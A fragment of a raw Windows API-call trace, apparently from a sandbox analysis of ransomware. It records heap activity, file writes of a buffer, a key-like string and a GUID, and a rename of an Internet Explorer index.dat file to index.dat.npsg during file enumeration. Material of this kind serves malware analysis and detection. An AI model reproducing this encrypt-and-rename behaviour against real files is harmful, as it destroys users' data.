Flags=0x0, Size=0x20) returned 0x33fd4c8 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0241.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0241.598] GetCurrentThreadId () returned 0x5b4 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a168 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0241.598] GetCurrentThreadId () returned 0x5b4 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0241.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0241.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fa0 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0241.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0241.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fb8 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f88 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89018 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89030 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fd0 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fa0 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0241.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0241.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0241.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0241.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0241.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0241.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0241.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f88 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fad8 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0241.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0241.602] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x7ffb, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x7ffb, lpOverlapped=0x0) returned 1 [0241.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0241.603] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.603] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0241.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0241.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0241.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0241.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0241.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0241.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0241.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0241.606] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0241.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0241.606] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0241.606] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0241.606] CloseHandle (hObject=0x644) returned 1 [0241.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0241.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b8bcd0 [0241.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0241.608] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.npsg")) returned 1 [0241.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0241.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0241.609] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.610] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0241.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0241.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8950 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x70df58 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ba8 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8c70 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d868 | out: hHeap=0x620000) returned 1 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3397bb8 | out: hHeap=0x620000) returned 1 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8950 | out: hHeap=0x620000) returned 1 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0241.611] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8950 [0241.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8950 | out: hHeap=0x620000) returned 1 [0241.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0241.611] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0241.611] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0241.612] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0241.612] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 